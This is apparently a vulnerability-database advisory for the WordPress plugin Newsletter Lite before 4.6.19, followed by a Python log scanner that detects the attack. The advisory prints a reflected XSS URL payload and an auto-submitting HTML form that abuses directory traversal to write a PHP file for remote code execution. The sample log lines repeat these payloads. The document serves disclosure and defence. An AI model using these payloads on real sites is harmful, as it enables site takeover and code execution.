wpexploit / Wpvulndb / WPEX-ID:C1147745-9E0E-454D-8F7C-179D818B3596
History: Jul 01, 2019 - 12:00 a.m.

Newsletter Lite < 4.6.19 - Multiple Issues

EPSS: 0.003 (Low), percentile 66.3%

- Lack of CSRF, Authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, can lead to an authenticated reflected XSS issue.
- Authenticated Directory Traversal leading to RCE

XSS: As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>


RCE: Save the below code in an HTML file, then open it when logged in (with a role as low as Subscriber).

<html>
  <body onload="document.forms[0].submit()";>
    <form action="https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=../../nl_rce.php" method="POST">
      <input type="hidden" name="headings[0][0]" value=""/>
      <input type="hidden" name="subscribers[0][0]" value="<?php echo('Authenticated RCE'); ?>"/>
    </form>
  </body>
</html>

Then, the PHP file will be at https://<BLOG>/wp-content/uploads/nl_rce.php
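
A defender-side check for the two request shapes above, as an added example (not part of the original advisory or the plugin's code): it scans web access logs for admin-ajax.php calls to these actions where exportfile leaves the export directory or names a script, or where contentarea carries markup. The log lines are constructed, and the idea that legitimate values are a bare file name and a plain editor id is an assumption; only the query string is inspected, since access logs do not record POST bodies.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jul/2019:10:01:11 +0000] "POST /wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=..%2F..%2Fnl_rce.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jul/2019:10:02:40 +0000] "GET /wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea=%22%3E%3Csvg%2Fonload%3Dalert(%2FXSS%2F)%3E HTTP/1.1" 200 431 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Jul/2019:10:03:02 +0000] "GET /wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea=content HTTP/1.1" 200 388 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Jul/2019:10:04:15 +0000] "POST /wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=subscribers.csv HTTP/1.1" 200 9 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Jul/2019:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 2 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    q = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded once
    action = q.get("action", [""])[0]
    if action == "newsletters_exportmultiple":
        # Assumption: a legitimate export name is a bare, non-executable file name.
        name = q.get("exportfile", [""])[0].replace("\\", "/")
        if ".." in name.split("/"):
            return "exportfile-traversal"
        if re.search(r"\.(php\d?|phtml|phar)$", name, re.I):
            return "exportfile-script-extension"
    if action == "newsletters_load_new_editor":
        # Assumption: a legitimate contentarea is a plain editor id token.
        area = q.get("contentarea", [""])[0]
        if not re.fullmatch(r"[A-Za-z0-9_-]*", area):
            return "contentarea-markup"
    return None

def scan(log_text):
    """Return (client_ip, label) for every suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        label = classify(m.group(2)) if m else None
        if label:
            findings.append((m.group(1), label))
    return findings

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

A hit on either action from a low-privilege session is worth correlating with new .php files under wp-content/uploads, the location the advisory gives for the written file.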
